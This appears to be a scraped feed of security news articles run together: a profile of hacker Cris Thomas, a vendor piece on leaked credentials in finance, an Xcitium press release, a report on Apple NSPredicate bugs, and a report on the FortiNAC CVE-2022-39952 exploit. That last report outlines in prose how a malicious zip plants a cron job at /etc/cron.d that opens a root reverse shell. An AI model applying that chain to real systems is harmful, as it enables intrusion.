These days, Mudge is known as Peiter Zatko, who worked at DARPA and Google in key roles, and most recently in the news as the Twitter whistleblower who drew attention to the social network's lacking security stance. Weld Pond is Chris Wysopal, who co-founded Veracode. Kingpin is Joe Grand, a well-known security researcher and author who runs Grand Idea Studio. But when they see each other, they'll always be Mudge, Weld, and Kingpin to him.

"And for the most part, people still address me as Space Rogue or SR. At work, people call me Space, and occasionally I'll get Mr. Rogue, but that's usually as a joke," he says. "My wife actually referred herself in a Twitter thread the other day as Mrs. Space Rogue."

**Looking Back at Industry Change**

All kidding aside about handles, Space Rogue is still as much of a concerned industry watcher as those days back at the L0pht, stepping in front of federal lawmakers.

"I've always been interested in policy and how legal ramifications are impacting the online world. Right now, I'm following a lot of actions of CISA, and I have to say that as a nation we're actually doing a great job," he says. "In the past, government has been behind schedule and playing catch-up, but I think CISA's actually taken a very good, proactive approach, which is a welcome change in the industry."

At the same time, though, he says that there's this dichotomy in cybersecurity where over the last 25 years, everything has changed but is also still the same. There's a ton more awareness now, not just from policy makers or industry insiders but just individual workers or non-tech business executives, about things like ransomware or phishing.

"Most people have to go through some sort of security training in their job, so the awareness factor is much higher," he says.

At the same time, though, the cybersecurity world is still knocking its head against the same problems it did decades ago.

"We're making stupid mistakes. We're using default passwords. We're designing flat networks. And these are the same problems that we had 25 years ago," he says. "So, it's a little bit of some and a little less of some other stuff. A lot of things have changed and gotten better, but a lot of things have still stayed the same as well."

**PERSONALITY BYTES**

**What he does for fun:** A lot of treasured hobbies mirror his hacking interests — his fun project at the moment is setting up a Raspberry Pi for his son to help him learn Python and picoCTF. "You can't get Raspberry Pis at the moment, so I've had to cannibalize some of my old projects to get him one that he can use."

**Non-hacking hobbies:** There was a time he was into making hard cider, but he moved and had less room for all of the equipment. Now he's turned his sights to rock tumbling. "My youngest got a rock tumbler last year and never used or was very interested in it. And I was like 'Well, if you're not going to use it, I'm going to.' Now I have four tumblers and I'm rotating rocks in the basement all the time."

**Quirky tidbits:** He says he's kind of an open book, and shares a lot of fun stuff with co-workers via Slack, so there's nothing they'd be surprised to know about him. But like many folks in the industry, he's got his quirky interests. "I'm a big Saturn car aficionado."

**Favorite day-to-day drink:** "I drink a lot of caffeine-free Diet Coke."

**How he tells people what he does for a living:** Per his book, he wrote, "I rarely blurt out 'Hi, I’m a hacker' when I first meet people. Trying to explain to people what I do for work can sometimes be tricky and lead into all sorts of long and sticky conversations, so I usually just say I work in computers."

Cris Thomas: Space Rogue, From L0pht Hacker to IBM Security Influencer

The (Other) Risk in Finance
A few years ago, a Washington-based real estate developer received a document link from First American – a financial services company in the real estate industry – relating to a deal he was working on. Everything about the document was perfectly fine and normal.
The odd part, he told a reporter, was that if he changed a single digit in the URL, suddenly, he could see

****The (Other) Risk in Finance****

A few years ago, a Washington-based real estate developer received a document link from First American – a financial services company in the real estate industry – relating to a deal he was working on. Everything about the document was perfectly fine and normal.

The odd part, he told a reporter, was that if he changed a single digit in the URL, suddenly, he could see somebody else's document. Change it again, a different document. With no technical tools or expertise, the developer could retrieve FirstAm records dating back to 2003 – 885 _million_ in total, many containing the kinds of sensitive data disclosed in real estate dealings, like bank details, social security numbers, and of course, names and addresses.

That nearly a billion records could leak from so simple a web vulnerability seemed shocking. Yet even more severe consequences befall financial services companies every week. Verizon, in its most recent Data Breach Investigations Report, revealed that finance is the single most targeted industry worldwide when it comes to basic web application attacks. And according to Statista, successful breaches cost these companies an average of around six million dollars apiece. The IMF has estimated that industry-wide losses from cyberattacks "could reach a few hundred billion dollars a year, eroding bank profits and potentially threatening financial stability."

In response, executives are allocating millions more every year to sophisticated defense systems – XDR, SOCs, AI tools, and more. But while companies fortify against APTs and mature cybercriminal operations, security holes as _rudimentary_ as FirstAm's remain rampant across the industry.

There's one category of vulnerability, in particular, that rarely comes up in boardroom discussions. Once you start looking, though, you'll find it nearly everywhere. And far more than zero-days, deep fakes or spear phishing, it's quite easy for hackers to discover this kind of error, and pounce on it.

****A Vulnerability Everybody's Overlooking****

Image created with Midjourney

In 2019, three researchers from North Carolina State University tested a hypothesis commonly understood but not often discussed in cybersecurity.

Github and other source code repositories, the story goes, have caused a boom for the software industry. They allow talented developers to collaborate around the world by donating, taking and combining code into newer, better software, built faster than ever before. To enable the different code to get along, they use credentials – secret keys, tokens and so on. These connecting joints allow any bit of software to open its door to another. To prevent attackers from getting through the same way, they're protected behind a veil of security.

Or are they?

Between October 31, 2017 and April 20, 2018, the NCSU researchers analyzed over two billion files from over four million Github repositories, representing around 13 percent of everything on the site. Contained in those samples were nearly 600,000 API and cryptographic keys – secrets, embedded right in the source code, for anybody to see. Over 200,000 of those keys were unique, and they were spread across more than 100,000 repos in all.

Though the study accumulated data over six months, a few days – even a few hours – would have sufficed to make the point. The researchers highlighted how thousands of new secrets leaked during every day of their study.

Recent research has not only supported their data, it's taken it a step further. For example, in the 2021 calendar year alone, GitGuardian identified over six _million_ secrets published to Github – about three per every 1,000 commits.

At this point, one might wonder whether secret credentials contained ("hardcoded") in source code are really so bad if they're so common. Safety in numbers, right?

****The Danger of Hardcoded Credentials****

Hardcoded credentials seem like a theoretical vulnerability until they make their way into a live application.

Last Fall, Symantec identified nearly 2,000 mobile apps exposing secrets. Over three-quarters leaked AWS tokens, enabling outside parties to access private cloud services, and nearly half leaked tokens that further enabled "full access to numerous, often millions, of private files."

To be clear, these were legitimate, public applications used around the world today. Like the five banking apps Symantec found all using the same third-party SDK for digital identity authentication. Identification data is some of the most sensitive information apps possess, but this SDK leaked cloud credentials that "could expose private authentication data and keys belonging to every banking and financial app using the SDK." It didn't end there, since "users' biometric digital fingerprints used for authentication, along with users' personal data (names, dates of birth, etc.), were exposed in the cloud." In all, the five banking apps leaked over 300,000 of their users' biometric fingerprints.

If these banks have escaped compromise, they're lucky. Similar leaks have taken out even bigger fish before.

Like Uber. You'd imagine that only highly organized and talented cyber adversaries could breach a technology company of Uber's standing. In 2022, however, a 17 year-old managed to do it all on his own. After some light social engineering led him into the company's internal network, he located a Powershell script containing admin-level credentials for Uber's privileged access management system. That's all he needed to then compromise all sorts of downstream tools and services used by the company, from their AWS to their Google Drive, Slack, employee dashboards, and code repos.

This might have been a more remarkable story, had it not been for the _other_ time Uber lost secrets to hackers in a 2016 private repo breach that exposed data belonging to over 50 million customers and seven million drivers. Or the _other_ time they did it, through a public repo, in 2014, revealing the personal information of 100,000 drivers along the way.

****What to Do****

Finance is the single most targeted sector for cyberattackers worldwide. And every researcher who drudges up thousands of vulnerable apps, or millions of vulnerable repos, demonstrates just how simple it would be for attackers to identify hard-coded credentials in the code essential to running any modern company in this industry.

But just as easily as the bad guys could do it, so too could the good. Both AWS and Github themselves attempt, as best they can, to monitor for leaky credentials on their platforms. Clearly, those efforts aren't enough on their own, which is where a cybersecurity vendor steps in.

Learn more about monitoring source code for secrets from one of our experts

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Secret Vulnerability Finance Execs are Missing

**BLOOMFIELD, N.J., Feb. 21, 2023 (GLOBE NEWSWIRE) --** Xcitium, a security platform provider focused on preventing damage caused by Malware, today announced availability of its advanced endpoint security solution, ZeroDwell Containment, for customers with or without legacy EDR products.

Xcitium multi-patented technology closes the gaps in enterprise cybersecurity defenses left by traditional detection methods.

According to Tim Bandos, EVP of SOC services at Xcitium: “However sophisticated your security stack, there will always be new threats that slip through the cracks. With an estimated 560,000 new pieces of malware created every day, legacy EDR vendors will fail to detect anywhere between 1% and 5% of Unknown hostile payloads that cause immense damage.”

ZeroDwell Containment is the only solution in the marketplace that assures zero dwell time for cyber-attacks, and the only solution capable of preventing unknown threats without compromising productivity.

Dwell time is the amount of time it takes to detect an initial infection by an attacker from the moment it enters the system. As dwell time increases, so do the chances of damage, disruption or theft from malware, phishing, ransomware and other forms of cyber-attack. The mean average dwell times in the industry are well documented at ~21 days.

Xcitium’s ZeroDwell Containment isolates all unknown or suspect code entering an organization until it can be verified as trustworthy: all unknown objects are guilty until proven innocent. Unlike rival solutions, end users, applications, data, and business operations are never interrupted by ZeroDwell Containment, and contained attacks are no longer threats.

Ken Levine, Chief Executive of Xcitium: “No system that relies on detection alone can ensure all malware will be found and eliminated before it causes damage. Traditional detection is unable to detect unknown objects, and this is why breaches and ransoms persist worldwide! Xcitium, however, contains all unknown objects that have no known signature or hash, preventing attacker damage. This protection-first approach closes the cyber security gap. Organizations that run Zero Dwell Containment either with our full endpoint or alongside their existing solutions are more secure. To prove the point, Xcitium publishes weekly statistics.” 

Xcitium recently won a multi-year contract with Positivo Tecnologia, one of the leading provider of computers, cell phones, tablets, accessories, servers, educational technologies, smart homes devices, and mobile payment terminal in the Brazilian market.

Julio Guapo, CIO of Positivo Tecnologia, said: “We selected Xcitium as the cybersecurity solution to protect our internal company environment and users. During the POC process, the Positivo Tecnologia IT Security team put Xcitium through its paces, testing and repeatedly challenging its ZeroDwell Containment technology. Xcitium isolated the attacker’s execution path every single test period, so the threat was prevented from harming any endpoint.”

Nandor Feher, Positivo Tecnologia’s CISO further commented, “Xcitium’s ZeroDwell Containment offered to Positivo Tecnologia a compelling differentiation with patented breach prevention technology helping the Brazilian tech company to compose the corporate zero thrust architecture, as well as becoming one of the most important layers to neutralize and protect against ransomware, malware, and cyber-attacks. This is now one of the top tools in our department. It is enabling Positivo Tecnologia to face the cybersecurity challenges of modern attacks. It also helps us to fill so many of the roles of other tools. By consolidating, simplifying and being more efficient in our security operations and the ability to do all of that in one system, it proves its value every day.”

Frost & Sullivan named Xcitium as the 2022 Competitive Strategy Leader of the Endpoint Security industry. Sarah Pavlak, industry principal with Frost & Sullivan noted: “Xcitium’s ZeroDwell technology, utilizing patented kernel-level API virtualization, prevents unknown malware from accessing critical system resources that cause damage, while providing complete use of the unknown file or application—this is a distinct departure from all existing vendors that terminate the offending unknown only after their engine makes a threat determination.”

Xcitium was also named Product of the Year 2022 earlier this month by AV Labs, an independent malware test lab based in the European Union.

For additional details, please visit Xcitum.com.

**About Xcitium**

Xcitium, formerly known as Comodo Security Solutions, is used by more than 5,000 organizational customers and partners around the globe. Xcitium was founded with one simple goal – to put an end to cyber breaches. Our patented ZeroDwell technology uses CPU-Virtualization to isolate and remove threats like zero-day malware and ransomware before they cause any damage. ZeroDwell is the cornerstone of Xcitium’s endpoint suite, which includes preemptive endpoint containment, endpoint detection & response (EDR), managed detection & response (MDR), and extended managed detection & response (XDR). Since its inception, Xcitium has a track record of zero breaches when fully configured.

Xcitium Brings 'Zero Dwell' Capability to Legacy EDR Platforms

Organizations are urged to update to the latest versions of FortiNAC to patch a flaw that allows unauthenticated attackers to write arbitrary files on the system.

Researchers have released details for how to exploit a critical remote code execution (RCE) bug in Fortinet's FortiNAC product, which allows an unauthenticated attacker to write arbitrary files on the system and achieve RCE as a root user.

Organizations use FortiNAC as a network access control solution to oversee and secure all digital assets connected to the enterprise network. The product can be used to manage a range of devices, including: corporate endpoints, Internet of Things (IoT), operational technology and industrial control systems (OT/ICS), and connected medical devices (IoMT), among others. The idea is to provide visibility, control, and automated response for everything that connects to the network, and as such, the device offers a golden opportunity for attackers to pivot and move deep into networks, enumerate environments, steal sensitive information, and more.

Researchers at Horizon3.ai released a blog post with a technical analysis of and proof of concept (POC) exploit for the vulnerability, tracked as CVE-2022-39952, and revealed and patched by Fortinet last week. They subsequently released the exploit code on GitHub.

Fortinet's Gwendal Guégniaud discovered the vulnerability, which earned a critical rating of 9.8 on the CVSS vulnerability-severity scale. The bug allows attackers to take external control of a file name or path vulnerability in the FortiNAC Web server, Fortinet said in its advisory, thus allowing unauthenticated arbitrary writes on the system.

Fortinet has patched in its affected product versions, with customers urged to update to FortiNAC version 9.4.1 or above, FortiNAC version 9.2.6 or above, FortiNAC version 9.1.8, or FortiNAC version 7.2.0 or above.

**How to Exploit the Fortinet FortiNAC Flaw**

While there are several ways for attackers to obtain RCE by exploiting arbitrary file write flaws, the researchers wrote what's called a "cron job to /etc/cron.d/" to take advantage of the vulnerability, they said.

The researchers extracted filesystems from both the vulnerable and patched versions of the product to examine the flaw, finding that Fortinet removed an offending file called /bsc/campusMgr/ui/ROOT/configWizard/keyUpload.jsp in the update that patches the bug. It turns out that file allowed an unauthenticated endpoint to parse requests that supply a file in the key parameter and then write it to /bsc/campusMgr/config.applianceKey, the researchers said.

To exploit this flaw, researchers successfully wrote the file and made a call that executes a bash script, which in turn can unzip the file that was just written. The unzip process "will allow placing files in any paths as long as they do not traverse above the current working directory," Horizon3.ai's chief attack engineer Zach Hanley wrote in the blog post. "Because the working directory is /, the call unzip inside the bash script allows any arbitrary file to be written."

"Immediately, seeing this call on the attacker-controlled file gave us flashbacks to a few recent vulnerabilities we’ve looked at that have abused archive unpacking," he added.

Researchers used the aforementioned cron job — which entails using the code /etc/cron.d/payload — to weaponize the flaw. The job gets triggered every minute and initiates a reverse shell to the attacker. To do this, researchers created a zip archive that contains a file and specifies the path for extraction, and then sent the malicious zip file to the vulnerable endpoint in the key field, they said.

"Within a minute, we get a reverse shell as the root user," which then can allow for remote code to be executed, Hanley wrote.

**History of Attacker Interest**

Historically, attackers have had a tendency to pounce on Fortinet flaws — sometimes even before the company knows they exist. Since they offer a prime opportunity to gain a foothold on enterprise networks, it would be prudent for any organizations running affected versions of FortiNAC to update to the patched products ASAP. So far, neither Fortinet nor Horizon3.ai are aware of any instances of attackers taking advantage of the flaw, but now that the latter's proof of concept is released, with step-by-step details on how it can be exploited, this is likely to change. 

As recently as January, the researchers tied a sophisticated new backdoor dubbed BoldMove to a zero-day vulnerability that Fortinet discovered in multiple versions of its FortiOS and FortiProxy technologies in December. The flaw allowed an unauthenticated attacker to execute arbitrary code on affected systems. In the zero-day attack, a China-based threat actor engaged in cyber-espionage operations apparently had written the malware to run specifically on Fortinet's FortiGate firewalls even before the vulnerability was made public and patched, the researchers discovered.

In October, attackers also showed significant interest in a critical authentication bypass vulnerability in multiple versions of Fortinet's FortiOS, FortiProxy, and FortiSwitchManager technologies, particularly after exploit code for the flaw was released.

Exploit Code Released for Critical Fortinet RCE Bug

By Deeba Ahmed
The bugs allowed cybercriminals to bypass the iOS system's security protections and execute unauthorized code. 
This is a post from HackRead.com Read the original post: Apple Bug Could Allow Attackers Access to Photos and Messages

The findings are based on previous research from Google and Citizen Lab conducted in 2021 which discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to the Israeli NSO Group.

Apple devices and products are known for their advanced security mechanisms, particularly the iPhone and Macbook. However, the latest research reveals that even Apple products aren’t safe from the prying eyes of threat actors.

Researchers at the cybersecurity firm Trellix Advanced Research Center have disclosed details of a newly discovered privilege escalation bug class that, if exploited, could allow an attacker to sweep up call history, messages, and photos from the device.

According to researchers, the bugs allowed cybercriminals to bypass the iOS system’s security protections and execute unauthorized code. The security flaws were ranked as medium to high in terms of security.

Trellix’s vulnerability research director, Doug McKee, stated that although Apple has addressed the issue, the concern is that these vulnerabilities allow bypassing of Apple’s security model at a “fundamental level.”

Apple said the bugs weren’t exploited in the wild before being fixed.

**How Was the Bug Discovered?**

The findings are based on previous research from Google and Citizen Lab conducted in 2021. The organizations discovered a zero-click, zero-day iOS exploit dubbed “ForcedEntry,” linked to NSO Group.

This was a highly sophisticated exploit found on a Saudi activist’s iPhone and was used for installing Pegasus malware developed by the NSO Group. The same spyware was also found on the iPhones of nine State Department officials in the United States.

This exploit had two key features: first, it tricked the iPhone into opening a malicious PDF disguised as a GIF file. Secondly, it enabled attackers to evade the sandbox that Apple introduced to prevent apps from accessing data from other apps or other parts of the device.

This second feature of ForcedEntry was the basis of Trellix’s research from senior vulnerability researcher Austin Emmitt. A proof-of-concept was released to demonstrate how the bugs could be exploited.

**Vulnerabilities**

Emmitt discovered a new class of vulnerabilities revolving around the NSPredicate tool that filters code within Apple’s systems. This tool was first exploited in ForcedEntry, as the 2021 research revealed, and Apple introduced new measures to prevent this abuse.

However, the mitigation methods were insufficient, as Trellix researchers found that these methods could also be bypassed since bugs in the NSPredicate class were found in multiple places in macOS and iOS systems.

This includes the Springboard app, which manages the home screen on an iPhone and can access photos, location data, and the camera. After exploiting the bugs, the attacker could access places they could not otherwise invade. Attackers trying to exploit it need to gain an initial foothold into the device.

Vulnerabilities in NSPredicate were discovered in macOS 13.2 and iOS 16.3, and Apple patched them with software updates in January. The company also issued CVEs for these flaws—CVE-2023-23530 and CVE-2023-23531—and released new versions of macOS and iOS.

1.  Apple AirTags used as trojan for credential hacking
2.  iOS Devices Receive Vital Security Updates from Apple
3.  Charging cable remotely steals data from Apple devices
4.  55 Apple bugs risked iCloud account takeover, data theft
5.  Study: Android sends more data to Google than iOS to Apple

Tag

#zero_day